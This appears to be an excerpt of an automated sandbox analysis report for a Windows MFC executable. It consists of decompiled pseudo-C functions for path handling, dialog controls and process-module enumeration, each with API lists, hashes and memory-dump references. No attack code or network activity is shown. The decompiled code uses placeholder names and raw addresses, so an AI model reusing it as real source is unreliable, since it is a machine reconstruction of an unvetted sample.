Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #4055$#5162
String ID:
API String ID: 3043833971-0
Opcode ID: 37af21469b6627142f55fca8591be05328b53c68892464db9da3eefa931cbdff
Instruction ID: 0dc3e2e28399c74215925a8af3094a25e5e0d025d9fe8b8869d4568a39b832fd
Opcode Fuzzy Hash: 37af21469b6627142f55fca8591be05328b53c68892464db9da3eefa931cbdff
Instruction Fuzzy Hash: 77016770B44F10EAD6146B25B86577D2595E748716F70103FA5014B6D2DBFC84868B4C

Uniqueness

Uniqueness Score: -1.00%

Function 004280F9, Relevance: 9.0, APIs: 6, Instructions: 39
stringCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E004280F9(void* __ecx) {
				signed int _t14;
				signed int _t15;
				intOrPtr _t21;
				void* _t24;

				_t24 = __ecx;
				_push(0x103);
				_push( *((intOrPtr*)(__ecx + 0xd4)) + 0x150);
				_push(0x494);
				L0043E066();
				L0043E006();
				_t14 = lstrlenA( *((intOrPtr*)(__ecx + 0xd4)) + 0x150);
				if(_t14 != 0) {
					_t14 = _t14 - 1;
					if(_t14 != 0) {
						_t21 =  *((intOrPtr*)(_t24 + 0xd4));
						if( *((char*)(_t21 + _t14 + 0x150)) != 0x5c) {
							_t14 = lstrcatA(_t21 + 0x150, 0x4545a8);
						}
					}
				}
				_push(0x493);
				L0043DFA6();
				_t15 = _t14 & 0xffffff00 | _t14 != 0x00000000;
				 *( *((intOrPtr*)(_t24 + 0xd4)) + 0x14d) = _t15;
				L0043E03C();
				return _t15;
			}

0x004280fa
0x00428108
0x0042810f
0x00428110
0x00428115
0x0042811c
0x0042812a
0x00428132
0x00428134
0x00428135
0x00428137
0x00428145
0x0042814f
0x0042814f
0x00428145
0x00428135
0x00428155
0x0042815c
0x00428169
0x0042816c
0x00428174
0x0042817b

APIs

#3092.MFC42(00000494,?,00000103), ref: 00428115
#3873.MFC42(00000494,?,00000103), ref: 0042811C
lstrlenA.KERNEL32(?,00000494,?,00000103), ref: 0042812A
lstrcatA.KERNEL32(?,004545A8), ref: 0042814F
#4055.MFC42(00000493), ref: 0042815C
#4853.MFC42(00000493), ref: 00428174

Memory Dump Source

Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #3092#3873#4055#4853lstrcatlstrlen
String ID:
API String ID: 2041594060-0
Opcode ID: 919a86e20e2a5d41e8434c062e957642e4582657f8e03f6ea429c70022980ed3
Instruction ID: f86850fafda89df5b6a60dc634866d5acbdf4634ab12ec0e2c5882dc51451cfc
Opcode Fuzzy Hash: 919a86e20e2a5d41e8434c062e957642e4582657f8e03f6ea429c70022980ed3
Instruction Fuzzy Hash: E1F0A4617016109BD73857A6ED09FAF265A8BC4705F08042EA2058A3C1DABC9801C728

Uniqueness

Uniqueness Score: -1.00%

Function 0042A6AA, Relevance: 9.0, APIs: 6, Instructions: 39
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0042A6AA(CHAR* _a4, signed int _a8, signed int _a12) {
				char _v264;
				int _t19;
				void* _t34;

				GetModuleFileNameA(0,  &_v264, 0x103);
				_t19 = lstrlenA( &_v264);
				 *(_t34 + _t19 - lstrlenA( *(0x454cc8 + _a12 * 4)) - 0x104) =  *(_t34 + _t19 - lstrlenA( *(0x454cc8 + _a12 * 4)) - 0x104) & 0x00000000;
				lstrcatA( &_v264,  *(0x454cc8 + _a8 * 4));
				return lstrcpyA(_a4,  &((strrchr( &_v264, 0x5c))[1]));
			}

0x0042a6c3
0x0042a6d6
0x0042a6f2
0x0042a701
0x0042a726

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000103), ref: 0042A6C3
lstrlenA.KERNEL32(?), ref: 0042A6D6
lstrlenA.KERNEL32 ref: 0042A6E4
lstrcatA.KERNEL32(00000000), ref: 0042A701
strrchr.MSVCRT ref: 0042A710
lstrcpyA.KERNEL32(?,00000001), ref: 0042A71D

Memory Dump Source

Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: lstrlen$FileModuleNamelstrcatlstrcpystrrchr
String ID:
API String ID: 1820563544-0
Opcode ID: 3c7b2a7acd7e6e49e397a5feaf6414426f3b1127d66c0ea546b2bdf0dab544e4
Instruction ID: fb68a417a9bb70393b914a17b714521400adcb08387af2e42271ac6b7d06c342
Opcode Fuzzy Hash: 3c7b2a7acd7e6e49e397a5feaf6414426f3b1127d66c0ea546b2bdf0dab544e4
Instruction Fuzzy Hash: 21016DBA500158AFDB10EFA8EC49FDA7BBCEB96316F010171FB48D70A0D6B099958F50

Uniqueness

Uniqueness Score: -1.00%

Function 0041BDFD, Relevance: 9.0, APIs: 6, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041BDFD(struct HWND__* _a4, int _a8) {
				void* _t6;
				struct HWND__* _t10;
				long _t11;

				_t10 = _a4;
				_t11 = GetWindowLongA(_t10, 0xfffffff4);
				if(_t11 != 0x472) {
					if(_t11 == 0x497 || _t11 == 0x496) {
						if(IsDlgButtonChecked(GetParent(_t10), 0x473) == 0) {
							goto L6;
						}
					} else {
						L6:
						if(_t11 != 0x46a) {
							goto L7;
						}
					}
				} else {
					if(IsDlgButtonChecked(GetParent(_t10), 0x470) != 0) {
						L7:
						EnableWindow(_t10, _a8);
					} else {
					}
				}
				_t6 = 1;
				return _t6;
			}

0x0041bdff
0x0041be0c
0x0041be14
0x0041be35
0x0041be54
0x00000000
0x00000000
0x0041be56
0x0041be56
0x0041be5c
0x00000000
0x00000000
0x0041be5c
0x0041be16
0x0041be2b
0x0041be5e
0x0041be63
0x00000000
0x0041be2d
0x0041be2b
0x0041be6b
0x0041be6e

APIs

GetWindowLongA.USER32 ref: 0041BE06
GetParent.USER32(?), ref: 0041BE1C
IsDlgButtonChecked.USER32(00000000), ref: 0041BE23
GetParent.USER32(?), ref: 0041BE45
IsDlgButtonChecked.USER32(00000000), ref: 0041BE4C
EnableWindow.USER32(?,?), ref: 0041BE63

Memory Dump Source

Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: ButtonCheckedParentWindow$EnableLong
String ID:
API String ID: 3409643953-0
Opcode ID: ec3773c02020bc5fc53f086ff6299f3d7338812065cb027a3f934adf3cfbdfce
Instruction ID: 7a2417e5a3887355a066d28c0932c8caff54f6e582b5bf12f7633fb56270947d
Opcode Fuzzy Hash: ec3773c02020bc5fc53f086ff6299f3d7338812065cb027a3f934adf3cfbdfce
Instruction Fuzzy Hash: 0DF036BA905310ABDA202BB4AC4CBEF6668E7D6711F01853BF755E61A0C728488167DE

Uniqueness

Uniqueness Score: -1.00%

Function 00420679, Relevance: 9.0, APIs: 6, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00420679(void* __ecx) {
				void* _t19;
				signed int _t30;
				void* _t32;

				_t19 = E0043E4E0(0x441f07, _t32);
				 *(_t32 - 0x14) =  *(_t32 - 0x14) & 0x00000000;
				_push( *((intOrPtr*)(_t32 + 0xc)));
				L0043DE26();
				_t30 = 1;
				_push(0x5c);
				 *(_t32 - 4) = _t30;
				L0043DFB8();
				if(_t19 != 0xffffffff) {
					_push(_t19 + 1);
					_push( *((intOrPtr*)(_t32 + 8)));
					L0043DFB2();
					 *(_t32 - 0x14) = _t30;
				} else {
					_push( *((intOrPtr*)(_t32 + 0xc)));
					L0043DE26();
					 *(_t32 - 0x14) = _t30;
				}
				 *(_t32 - 4) =  *(_t32 - 4) & 0x00000000;
				L0043DD36();
				 *[fs:0x0] =  *((intOrPtr*)(_t32 - 0xc));
				return  *((intOrPtr*)(_t32 + 8));
			}

0x0042067e
0x00420685
0x0042068a
0x00420690
0x0042069a
0x0042069b
0x0042069d
0x004206a0
0x004206a8
0x004206be
0x004206bf
0x004206c2
0x004206c7
0x004206aa
0x004206aa
0x004206b0
0x004206b5
0x004206b5
0x004206ca
0x004206d1
0x004206dd
0x004206e5

APIs

__EH_prolog.LIBCMT ref: 0042067E
#537.MFC42(00000008,74B48170,?,?,00420500,?,00000008,?,?,?), ref: 00420690
#5683.MFC42(0000005C,00000008,74B48170,?,?,00420500,?,00000008,?,?,?), ref: 004206A0
#537.MFC42(00000008,0000005C,00000008,74B48170,?,?,00420500,?,00000008,?,?,?), ref: 004206B0
#4277.MFC42(?,00000001,0000005C,00000008,74B48170,?,?,00420500,?,00000008,?,?,?), ref: 004206C2
#800.MFC42(?,00000001,0000005C,00000008,74B48170,?,?,00420500,?,00000008,?,?,?), ref: 004206D1

Memory Dump Source

Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #537$#4277#5683#800H_prolog
String ID:
API String ID: 84380077-0
Opcode ID: 4ffa33b561a4ba27e4cc31c1d8285ab76e1dc93f4118b1d69c09df7a61004fe6
Instruction ID: b22c18198c0013c2273cd41f76d89bdd74f07319dc2c7189c6d7d5fc1992d85c
Opcode Fuzzy Hash: 4ffa33b561a4ba27e4cc31c1d8285ab76e1dc93f4118b1d69c09df7a61004fe6
Instruction Fuzzy Hash: C0014631900129EBDB15EF51D942BEEBB30FF18328F10920EB4226A2D1CB785A04CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040325A, Relevance: 9.0, APIs: 6, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E0040325A(intOrPtr* __ecx) {
				void* _t22;
				void* _t23;
				void* _t35;

				E0043E4E0(E0043EE44, _t35);
				_push(_t35 - 0xd8);
				_push( *((intOrPtr*)(_t35 + 8)));
				 *((intOrPtr*)( *__ecx + 0x20))();
				_t22 = _t35 - 0xd8;
				_push(_t22);
				L0043DE26();
				 *(_t35 - 4) =  *(_t35 - 4) & 0x00000000;
				_push(0x4532cc);
				_push(_t22);
				_t23 = _t35 + 8;
				_push(_t23);
				L0043DE20();
				_push(_t23);
				 *(_t35 - 4) = 1;
				L0043DE1A();
				 *(_t35 - 4) =  *(_t35 - 4) & 0x00000000;
				L0043DD36();
				 *(_t35 - 4) =  *(_t35 - 4) | 0xffffffff;
				L0043DD36();
				 *[fs:0x0] =  *((intOrPtr*)(_t35 - 0xc));
				return _t23;
			}

0x0040325f
0x00403275
0x00403276
0x0040327b
0x0040327e
0x00403287
0x00403288
0x0040328d
0x00403291
0x00403296
0x00403297
0x0040329a
0x0040329b
0x004032a0
0x004032a4
0x004032a8
0x004032ad
0x004032b4
0x004032b9
0x004032c0
0x004032c9
0x004032d1

APIs

__EH_prolog.LIBCMT ref: 0040325F
#537.MFC42(?), ref: 00403288
#924.MFC42(?,00000000,004532CC,?), ref: 0040329B
#939.MFC42(00000000,?,00000000,004532CC,?), ref: 004032A8
#800.MFC42(00000000,?,00000000,004532CC,?), ref: 004032B4
#800.MFC42(00000000,?,00000000,004532CC,?), ref: 004032C0

Memory Dump Source

Source File: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #800$#537#924#939H_prolog
String ID:
API String ID: 637726327-0
Opcode ID: dd59b32fece5850020e59c0b2d3f2d76185f90b7094dcba899eb63becd1a8088
Instruction ID: 2127a0f9e1199256b59702e538b6bbfc2c294042f1613ea291c984e93a012e33
Opcode Fuzzy Hash: dd59b32fece5850020e59c0b2d3f2d76185f90b7094dcba899eb63becd1a8088
Instruction Fuzzy Hash: DE018F72900119EBCB15EFA0C946BDEBB78AF18318F00469EB416631C1DB785B08CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00419198, Relevance: 9.0, APIs: 6, Instructions: 29
windowCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E00419198(void* __eax, void* __ecx) {
				long _t3;

				_push(0x442);
				L0043E066();
				_t3 = SendMessageA( *(__eax + 0x20), 0x402, 0, 0);
				if(_t3 == 0) {
					_push(_t3);
					_push(0x4e26);
					L0043DF82();
					_push(0xffffffff);
					_push(0x40);
					_push(0xe027);
					L0043E2CA();
					_push(0x442);
					L0043E066();
					L0043DF9A();
					return _t3;
				}
				return _t3;
			}

0x004191a1
0x004191a2
0x004191b3
0x004191bb
0x004191bd
0x004191be
0x004191c5
0x004191ca
0x004191cc
0x004191ce
0x004191d3
0x004191d8
0x004191db
0x004191e2
0x00000000
0x004191e2
0x004191e9

APIs

#3092.MFC42(00000442), ref: 004191A2
SendMessageA.USER32(?,00000402,00000000,00000000), ref: 004191B3
#1779.MFC42(00004E26,00000000), ref: 004191C5
#1199.MFC42(0000E027,00000040,000000FF,00004E26,00000000), ref: 004191D3
#3092.MFC42(00000442,0000E027,00000040,000000FF,00004E26,00000000), ref: 004191DB
#5981.MFC42(00000442,0000E027,00000040,000000FF,00004E26,00000000), ref: 004191E2

Memory Dump Source

Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #3092$#1199#1779#5981MessageSend
String ID:
API String ID: 2520177310-0
Opcode ID: af0d95109230e5188592ff9847262d82982841f5a88fca12c1279020c98e0f10
Instruction ID: 04c1b6eb81eea36406318f166dc8798189d026773844d55e561479d89cacf9c6
Opcode Fuzzy Hash: af0d95109230e5188592ff9847262d82982841f5a88fca12c1279020c98e0f10
Instruction Fuzzy Hash: 9EE09AA0B4022176F9242327AD0BF2E1428AB85F24F00122FB306BA1E2D9E85D01012D

Uniqueness

Uniqueness Score: -1.00%

Function 00418A07, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 65
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 94%

			E00418A07(intOrPtr __ecx) {
				void* __esi;
				void* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t41;
				void* _t42;
				intOrPtr* _t60;
				intOrPtr* _t61;
				intOrPtr _t67;
				void* _t69;

				E0043E4E0(0x440fbd, _t69);
				_push(__ecx);
				_push(__ecx);
				_t67 = __ecx;
				 *((intOrPtr*)(_t69 - 0x10)) = __ecx;
				 *(_t69 - 4) =  *(_t69 - 4) & 0x00000000;
				_t60 = __ecx + 0x44c;
				 *((intOrPtr*)(_t69 - 0x14)) = _t60;
				 *_t60 = 0x445440;
				 *(_t69 - 4) = 7;
				L0043DD72();
				 *_t60 = 0x44547c;
				_t61 = __ecx + 0x444;
				 *((intOrPtr*)(_t69 - 0x14)) = _t61;
				 *_t61 = 0x445440;
				 *(_t69 - 4) = 8;
				L0043DD72();
				 *_t61 = 0x44547c;
				_t62 = __ecx + 0x330;
				 *((intOrPtr*)(_t69 - 0x14)) = __ecx + 0x330;
				 *(_t69 - 4) = 9;
				_t35 = L00403FBC(__ecx + 0x40c);
				 *(_t69 - 4) = 4;
				L00404083(_t35, _t62, _t67);
				_t63 = _t67 + 0x21c;
				 *((intOrPtr*)(_t69 - 0x14)) = _t67 + 0x21c;
				 *(_t69 - 4) = 0xa;
				_t37 = L00403FBC(_t67 + 0x2f8);
				 *(_t69 - 4) = 3;
				_t38 = L00404083(_t37, _t63, _t67);
				 *(_t69 - 4) = 2;
				_t39 = L00404F36(_t38, _t67 + 0x1c8, _t67);
				 *(_t69 - 4) = 1;
				L00404F36(_t39, _t67 + 0x174, _t67);
				_t64 = _t67 + 0x60;
				 *((intOrPtr*)(_t69 - 0x14)) = _t67 + 0x60;
				 *(_t69 - 4) = 0xb;
				_t41 = L00403FBC(_t67 + 0x13c);
				 *(_t69 - 4) =  *(_t69 - 4) & 0x00000000;
				_t42 = L00404083(_t41, _t64, _t67);
				 *(_t69 - 4) =  *(_t69 - 4) | 0xffffffff;
				L0043E04E();
				 *[fs:0x0] =  *((intOrPtr*)(_t69 - 0xc));
				return _t42;
			}

0x00418a0c
0x00418a11
0x00418a12
0x00418a15
0x00418a18
0x00418a1b
0x00418a1f
0x00418a25
0x00418a28
0x00418a30
0x00418a34
0x00418a3e
0x00418a40
0x00418a46
0x00418a49
0x00418a51
0x00418a55
0x00418a5a
0x00418a5c
0x00418a62
0x00418a6b
0x00418a6f
0x00418a76
0x00418a7a
0x00418a7f
0x00418a85
0x00418a8e
0x00418a92
0x00418a99
0x00418a9d
0x00418aa8
0x00418aac
0x00418ab7
0x00418abb
0x00418ac0
0x00418ac3
0x00418acc
0x00418ad0
0x00418ad5
0x00418adb
0x00418ae0
0x00418ae6
0x00418af1
0x00418af9

APIs

__EH_prolog.LIBCMT ref: 00418A0C
#2414.MFC42(?,?,?,?,?,004189F3), ref: 00418A34
#2414.MFC42(?,?,?,?,?,004189F3), ref: 00418A55
#641.MFC42(?,?,?,?,?,004189F3), ref: 00418AE6

Strings

|TD, xrefs: 00418A39

Memory Dump Source

Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #2414$#641H_prolog
String ID: |TD
API String ID: 4010925728-231495167
Opcode ID: 156f6d9e4f06cb9c9ea0b5ea5351ea398ba7e02b0546579aa7696673fc3c0121
Instruction ID: fd43742f172e9bb6331bedefd9d3c01534a2785723ea9a414f22a38e49391883
Opcode Fuzzy Hash: 156f6d9e4f06cb9c9ea0b5ea5351ea398ba7e02b0546579aa7696673fc3c0121
Instruction Fuzzy Hash: C0219EB1901686DFDB14DBA9C1013DDFBB9AF95308F14419F949677282CBB82B08C766

Uniqueness

Uniqueness Score: -1.00%

Function 00428B5B, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,?,?,__oxFrame.class__,?,?,0042899F,?,?), ref: 00428B7E
EnumProcessModules.PSAPI(00000000,?,00000004,?,?,?,0042899F,?,?), ref: 00428B95
GetModuleFileNameExA.PSAPI(00000000,?,?,00000104,?,?,0042899F,?,?), ref: 00428BAB
CloseHandle.KERNEL32(00000000,?,?,0042899F,?,?), ref: 00428BBD

Strings

__oxFrame.class__, xrefs: 00428B72

Memory Dump Source

Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
